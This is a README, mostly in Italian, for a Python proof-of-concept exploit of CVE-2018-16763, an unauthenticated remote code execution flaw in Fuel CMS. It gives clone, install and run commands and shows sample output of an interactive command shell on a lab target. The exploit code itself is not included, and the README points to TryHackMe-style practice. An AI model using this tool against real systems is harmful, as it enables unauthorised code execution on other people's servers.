
Un exploit Proof-of-Concept (PoC) per CVE-2018-16763 (Fuel CMS - Esecuzione remota di codice non autenticata).
Un exploit Proof-of-Concept (PoC) per CVE-2018-16763 (Fuel CMS - Preauthenticated Remote Code Execution).
Questo programma Python 3 funge da PoC per la vulnerabilità CVE-2018-16763 nel sistema di gestione dei contenuti Fuel CMS. In particolare, la vulnerabilità consente la valutazione del codice PHP attraverso il parametro pages/select/filter (implementato in questo PoC), portando a Preauthenticated Remote Code Execution, una vulnerabilità critica del sistema.
git clone https://github.com/saccles/CVE-2018-16763-Proof-of-Concept.git
cd CVE-2018-16763-Proof-of-Concept
python3 -m pip install -r requirements.txt
Esegui lo script exploit contro un target vulnerabile. (ESEGUI LO SCRIPT SOLO CONTRO UN TARGET DI TUA PROPRIETÀ O UN TARGET FORNITO DA TryHackMe, HackTheBox O UN ALTRO SITO DI HACKING ETICO!) Ti consiglio di dare un'occhiata alla sfida "Ignite" di TryHackMe per maggiori dettagli. Puoi anche scaricare l'applicazione Fuel CMS vulnerabile da exploit-db.com.
python3 CVE-2018-16763.py -u URL
[DEBUG] Connecting to http://10.10.60.46 ...
[DEBUG] Succesfully connected!
Enter Command:
$ ls -la
total 52
drwxrwxrwx 4 root root 4096 Jul 26 2019 .
drwxr-xr-x 3 root root 4096 Jul 26 2019 ..
-rw-r--r-- 1 root root 163 Jul 26 2019 .htaccess
-rwxrwxrwx 1 root root 1427 Jul 26 2019 README.md
drwxrwxrwx 9 root root 4096 Jul 26 2019 assets
-rwxrwxrwx 1 root root 193 Jul 26 2019 composer.json
-rwxrwxrwx 1 root root 6502 Jul 26 2019 contributing.md
drwxrwxrwx 9 root root 4096 Jul 26 2019 fuel
-rwxrwxrwx 1 root root 11802 Jul 26 2019 index.php
-rwxrwxrwx 1 root root 30 Jul 26 2019 robots.txt
python3 CVE-2018-16763.py -h
usage: CVE-2018-16763.py [-h] -u URL
This tool exploits CVE-2018-16763 on Fuel CMS.
options:
-h, --help show this help message and exit
-u URL, --url URL Fuel CMS url.
Silas Accles [saccles]
Questo progetto è concesso in licenza con la licenza MIT - vedi il file LICENSE.md per i dettagli.
Fortemente ispirato dai programmi Exploit-DB, dagli script PoC di Vozec e dal PoC originale sviluppato da Padsala Trushal.